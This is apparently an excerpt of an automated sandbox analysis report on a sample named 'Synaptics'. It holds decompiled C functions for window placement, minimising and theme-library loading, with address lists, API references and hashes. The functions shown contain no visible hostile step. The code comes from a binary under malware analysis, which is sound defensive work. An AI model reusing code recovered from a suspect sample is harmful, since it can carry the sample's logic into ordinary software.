                                                                                                                                                                                                                            0x0044edd0
                                                                                                                                                                                                                            0x0044edd2
                                                                                                                                                                                                                            0x0044ede9
                                                                                                                                                                                                                            0x0044edec
                                                                                                                                                                                                                            0x0044edf0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef0
                                                                                                                                                                                                                            0x0044eef1
                                                                                                                                                                                                                            0x0044eef1
                                                                                                                                                                                                                            0x0044eef2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef2
                                                                                                                                                                                                                            0x0044edf9
                                                                                                                                                                                                                            0x0044edfd
                                                                                                                                                                                                                            0x0044ee02
                                                                                                                                                                                                                            0x0044ee10
                                                                                                                                                                                                                            0x0044ee1f
                                                                                                                                                                                                                            0x0044ee2d
                                                                                                                                                                                                                            0x0044ee39
                                                                                                                                                                                                                            0x0044ee47
                                                                                                                                                                                                                            0x0044ee50
                                                                                                                                                                                                                            0x0044ee65
                                                                                                                                                                                                                            0x0044ee7f
                                                                                                                                                                                                                            0x0044ee84
                                                                                                                                                                                                                            0x0044ee87
                                                                                                                                                                                                                            0x0044ee8a
                                                                                                                                                                                                                            0x0044ee8f
                                                                                                                                                                                                                            0x0044ee94
                                                                                                                                                                                                                            0x0044eea6
                                                                                                                                                                                                                            0x0044eea6
                                                                                                                                                                                                                            0x0044ea7c
                                                                                                                                                                                                                            0x0044ea7f
                                                                                                                                                                                                                            0x0044ebb0
                                                                                                                                                                                                                            0x0044ebb9
                                                                                                                                                                                                                            0x0044ebba
                                                                                                                                                                                                                            0x0044ebbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ebc2
                                                                                                                                                                                                                            0x0044ebc2
                                                                                                                                                                                                                            0x0044ebc3
                                                                                                                                                                                                                            0x0044ebc3
                                                                                                                                                                                                                            0x0044ebc5
                                                                                                                                                                                                                            0x0044ebd1
                                                                                                                                                                                                                            0x0044ebd4
                                                                                                                                                                                                                            0x0044ebd7
                                                                                                                                                                                                                            0x0044ebda
                                                                                                                                                                                                                            0x0044ec05
                                                                                                                                                                                                                            0x0044ebdc
                                                                                                                                                                                                                            0x0044ebe9
                                                                                                                                                                                                                            0x0044ebe9
                                                                                                                                                                                                                            0x0044ec08
                                                                                                                                                                                                                            0x0044ec0c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eca2
                                                                                                                                                                                                                            0x0044eca3
                                                                                                                                                                                                                            0x0044eca3
                                                                                                                                                                                                                            0x0044eca4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecaa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecaa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eca4
                                                                                                                                                                                                                            0x0044ec24
                                                                                                                                                                                                                            0x0044ec29
                                                                                                                                                                                                                            0x0044ec2b
                                                                                                                                                                                                                            0x0044ec32
                                                                                                                                                                                                                            0x0044ec3d
                                                                                                                                                                                                                            0x0044ec3f
                                                                                                                                                                                                                            0x0044ec3f
                                                                                                                                                                                                                            0x0044ec44
                                                                                                                                                                                                                            0x0044ec4c
                                                                                                                                                                                                                            0x0044ec4c
                                                                                                                                                                                                                            0x0044ec4f
                                                                                                                                                                                                                            0x0044ec51
                                                                                                                                                                                                                            0x0044ec57
                                                                                                                                                                                                                            0x0044ec59
                                                                                                                                                                                                                            0x0044ec60
                                                                                                                                                                                                                            0x0044ec60
                                                                                                                                                                                                                            0x0044ec66
                                                                                                                                                                                                                            0x0044ec6c
                                                                                                                                                                                                                            0x0044ec73
                                                                                                                                                                                                                            0x0044ec8f
                                                                                                                                                                                                                            0x0044ec98
                                                                                                                                                                                                                            0x0044ec75
                                                                                                                                                                                                                            0x0044ec85
                                                                                                                                                                                                                            0x0044ec85
                                                                                                                                                                                                                            0x0044ec73
                                                                                                                                                                                                                            0x0044ec51
                                                                                                                                                                                                                            0x0044ea85
                                                                                                                                                                                                                            0x0044ef43
                                                                                                                                                                                                                            0x0044ef46
                                                                                                                                                                                                                            0x0044ef4a
                                                                                                                                                                                                                            0x0044ef4d
                                                                                                                                                                                                                            0x0044ef51
                                                                                                                                                                                                                            0x0044ef54
                                                                                                                                                                                                                            0x0044ef55
                                                                                                                                                                                                                            0x0044ef5a
                                                                                                                                                                                                                            0x0044ef5a
                                                                                                                                                                                                                            0x0044ef5d
                                                                                                                                                                                                                            0x0044ef5f
                                                                                                                                                                                                                            0x0044ef62
                                                                                                                                                                                                                            0x0044ef65
                                                                                                                                                                                                                            0x0044ef72
                                                                                                                                                                                                                            0x0044ef72
                                                                                                                                                                                                                            0x0044ea76
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044ED0F
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                                                                                                                                                                                            • 73C9B080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044EE34
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: RestoreSave$B080NtdllProc_Window
                                                                                                                                                                                                                            • String ID: LbC
                                                                                                                                                                                                                            • API String ID: 4024241980-1054848185
                                                                                                                                                                                                                            • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A104 Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                            			E0045A104(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045906C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00407540();
						}
					}
					_t26 =  *0x49d970; // 0x49e900
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x49d970; // 0x49e900
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00454D78(_t36, 0);
						E00457194( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0045974C(_t51);
					_t21 =  *0x49ebbc; // 0x21e1320
					_t15 = _t21 + 0x64; // 0x0
					_t55 =  *_t15;
					if( *_t15 != 0) {
						_t21 = SetFocus(E00441704(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                                                                                                                                                                                                            0x0045a106
                                                                                                                                                                                                                            0x0045a10c
                                                                                                                                                                                                                            0x0045a113
                                                                                                                                                                                                                            0x0045a11d
                                                                                                                                                                                                                            0x0045a126
                                                                                                                                                                                                                            0x0045a160
                                                                                                                                                                                                                            0x0045a168
                                                                                                                                                                                                                            0x0045a137
                                                                                                                                                                                                                            0x0045a145
                                                                                                                                                                                                                            0x0045a147
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a149
                                                                                                                                                                                                                            0x0045a149
                                                                                                                                                                                                                            0x0045a14b
                                                                                                                                                                                                                            0x0045a150
                                                                                                                                                                                                                            0x0045a158
                                                                                                                                                                                                                            0x0045a159
                                                                                                                                                                                                                            0x0045a159
                                                                                                                                                                                                                            0x0045a147
                                                                                                                                                                                                                            0x0045a175
                                                                                                                                                                                                                            0x0045a17e
                                                                                                                                                                                                                            0x0045a180
                                                                                                                                                                                                                            0x0045a182
                                                                                                                                                                                                                            0x0045a182
                                                                                                                                                                                                                            0x0045a188
                                                                                                                                                                                                                            0x0045a191
                                                                                                                                                                                                                            0x0045a193
                                                                                                                                                                                                                            0x0045a195
                                                                                                                                                                                                                            0x0045a195
                                                                                                                                                                                                                            0x0045a19f
                                                                                                                                                                                                                            0x0045a1a4
                                                                                                                                                                                                                            0x0045a1a9
                                                                                                                                                                                                                            0x0045a1bc
                                                                                                                                                                                                                            0x0045a1c4
                                                                                                                                                                                                                            0x0045a1c4
                                                                                                                                                                                                                            0x0045a1cb
                                                                                                                                                                                                                            0x0045a1d0
                                                                                                                                                                                                                            0x0045a1d5
                                                                                                                                                                                                                            0x0045a1d5
                                                                                                                                                                                                                            0x0045a1da
                                                                                                                                                                                                                            0x0045a1e4
                                                                                                                                                                                                                            0x0045a1e4
                                                                                                                                                                                                                            0x0045a1f1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a1fb
                                                                                                                                                                                                                            0x0045a1f1
                                                                                                                                                                                                                            0x0045a203

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A10C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                                                                                                                                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3996302123-0
                                                                                                                                                                                                                            • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004410F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00441A08(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00441A08(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043A91C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0043A5D0(_t52);
						return E00403DE8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                                                                                                                                                                            0x004410f9
                                                                                                                                                                                                                            0x004410fb
                                                                                                                                                                                                                            0x004410fd
                                                                                                                                                                                                                            0x00441102
                                                                                                                                                                                                                            0x0044111d
                                                                                                                                                                                                                            0x00441126
                                                                                                                                                                                                                            0x00441154
                                                                                                                                                                                                                            0x00441154
                                                                                                                                                                                                                            0x00441157
                                                                                                                                                                                                                            0x0044115d
                                                                                                                                                                                                                            0x00441163
                                                                                                                                                                                                                            0x00441168
                                                                                                                                                                                                                            0x0044116d
                                                                                                                                                                                                                            0x0044116f
                                                                                                                                                                                                                            0x00441171
                                                                                                                                                                                                                            0x00441183
                                                                                                                                                                                                                            0x0044118d
                                                                                                                                                                                                                            0x00441198
                                                                                                                                                                                                                            0x00441199
                                                                                                                                                                                                                            0x0044119a
                                                                                                                                                                                                                            0x0044119b
                                                                                                                                                                                                                            0x004411a7
                                                                                                                                                                                                                            0x004411a7
                                                                                                                                                                                                                            0x004411ac
                                                                                                                                                                                                                            0x004411ae
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004411b9
                                                                                                                                                                                                                            0x0044112f
                                                                                                                                                                                                                            0x00441134
                                                                                                                                                                                                                            0x00441136
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044114d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00441111
                                                                                                                                                                                                                            0x00441111
                                                                                                                                                                                                                            0x00441117
                                                                                                                                                                                                                            0x004411c4
                                                                                                                                                                                                                            0x004411c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00441117

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0044112F
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                                                                                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                                                                                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 568898626-3772416878
                                                                                                                                                                                                                            • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A054 Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0045A054(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0045973C();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045906C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00407540();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                                                                                                                                                                                                            0x0045a056
                                                                                                                                                                                                                            0x0045a058
                                                                                                                                                                                                                            0x0045a05c
                                                                                                                                                                                                                            0x0045a063
                                                                                                                                                                                                                            0x0045a06b
                                                                                                                                                                                                                            0x0045a070
                                                                                                                                                                                                                            0x0045a074
                                                                                                                                                                                                                            0x0045a07d
                                                                                                                                                                                                                            0x0045a0e1
                                                                                                                                                                                                                            0x0045a0e4
                                                                                                                                                                                                                            0x0045a0a0
                                                                                                                                                                                                                            0x0045a0a4
                                                                                                                                                                                                                            0x0045a0b6
                                                                                                                                                                                                                            0x0045a0bc
                                                                                                                                                                                                                            0x0045a0c0
                                                                                                                                                                                                                            0x0045a0c5
                                                                                                                                                                                                                            0x0045a0c7
                                                                                                                                                                                                                            0x0045a0cc
                                                                                                                                                                                                                            0x0045a0d1
                                                                                                                                                                                                                            0x0045a0d1
                                                                                                                                                                                                                            0x0045a0d4
                                                                                                                                                                                                                            0x0045a0d5
                                                                                                                                                                                                                            0x0045a0d5
                                                                                                                                                                                                                            0x0045a0f1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a0fb
                                                                                                                                                                                                                            0x0045a0f1
                                                                                                                                                                                                                            0x0045a103

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A05C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1720852555-0
                                                                                                                                                                                                                            • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C6FC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x49e929 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0042C66C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x49e904; // 0x42c6fc
				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
				return  *0x49e904(_t23, _t19);
			}










                                                                                                                                                                                                                            0x0042c704
                                                                                                                                                                                                                            0x0042c707
                                                                                                                                                                                                                            0x0042c711
                                                                                                                                                                                                                            0x0042c73b
                                                                                                                                                                                                                            0x0042c74c
                                                                                                                                                                                                                            0x0042c75f
                                                                                                                                                                                                                            0x0042c74e
                                                                                                                                                                                                                            0x0042c753
                                                                                                                                                                                                                            0x0042c753
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c769
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c73d
                                                                                                                                                                                                                            0x0042c718
                                                                                                                                                                                                                            0x0042c725
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromWindow
                                                                                                                                                                                                                            • API String ID: 190572456-2842599566
                                                                                                                                                                                                                            • Opcode ID: 2850c889a9a11c96de1ba7b4d63e14319c300ad4c71145359c67bc565aba3dd9
                                                                                                                                                                                                                            • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2850c889a9a11c96de1ba7b4d63e14319c300ad4c71145359c67bc565aba3dd9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042E3B4 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E0042E3B4(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x49ea48; // 0x21e0dc8
				E0042E1AC(_t2);
				_push(_t111);
				_push(0x42e767);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x49ea44 =  *0x49ea44 + 1;
				if( *0x49ea40 == 0) {
					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
					if( *0x49ea40 > 0) {
						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
